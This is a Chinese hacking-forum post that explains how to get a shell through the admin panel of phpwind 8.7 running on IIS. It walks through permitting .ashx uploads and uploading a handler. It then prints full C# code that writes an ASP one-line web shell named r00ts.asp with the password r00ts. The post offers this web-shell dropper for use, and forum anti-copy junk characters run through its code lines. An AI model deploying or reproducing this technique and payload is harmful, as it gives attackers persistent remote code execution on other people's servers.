找回密码
 立即注册
查看: 3224|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小, b, \6 G. f1 N: d; I; Z  h* D

8 R- H1 r4 U0 j: h8 o5 R群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
6 ]$ x! _: N$ s+ \/ Z
( p" M4 @( f8 ]8 n- P9 L8 \' R发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
+ @& n7 b  ~3 f# q4 t& ^
! ]3 H' d$ ?+ x/ S8 Z然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
' ]7 O! {( B" n2 Y$ Y* H% ~- v 9 }7 T6 U2 L# M# L6 H6 U
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
* I" Q; n, r5 C2 k # |7 R0 ]4 o; v6 |: e/ D2 R
下面是代码:
, r2 {$ x4 U% g# p, o , P+ }! t+ \9 J7 U3 M( y
<%@ WebHandler Language="C#"Class="Handler" %>6 u7 `; ?) {7 J& j  {' P
using System;2 S1 W0 E: g! W* P5 j. A8 }( l
using System.Web;
( b) l. X2 c' Q2 uusing System.IO;" s0 x2 u" C9 {3 T  L3 u1 k; N/ v
public class Handler : IHttpHandler {( h9 c& ~/ i: S- x5 z
public void ProcessRequest (HttpContext context) {
% d+ r/ l6 y/ T9 ~$ ?, j. Tcontext.Response.ContentType = "text/plain";* Z6 h- R: ?3 _; Y! F
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
& O' A% A2 i, B! ~* wfile1.Write("<%eval request(\"r00ts\")%>");, G% g& M; D* f8 [% ]/ W
file1.Flush();
; N9 z$ I- h3 N% D9 ?( rfile1.Close();
+ G) n" F# G; J% x! T) J}+ N; y" [' _* @# L9 }" l: l% I6 f
public bool IsReusable {
% A; T7 V5 ]0 U& ^& M+ I/ I) Oget {1 Y6 d0 S( I) E% ~) r
return false;
, {; W) }! C1 z" U; Y( T}$ k1 n$ U$ j# u: V9 W$ V6 a2 Z4 ?
}
6 B  s2 X0 ^; R}; Y  s- m5 F$ @& y8 h2 O4 j1 V. U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表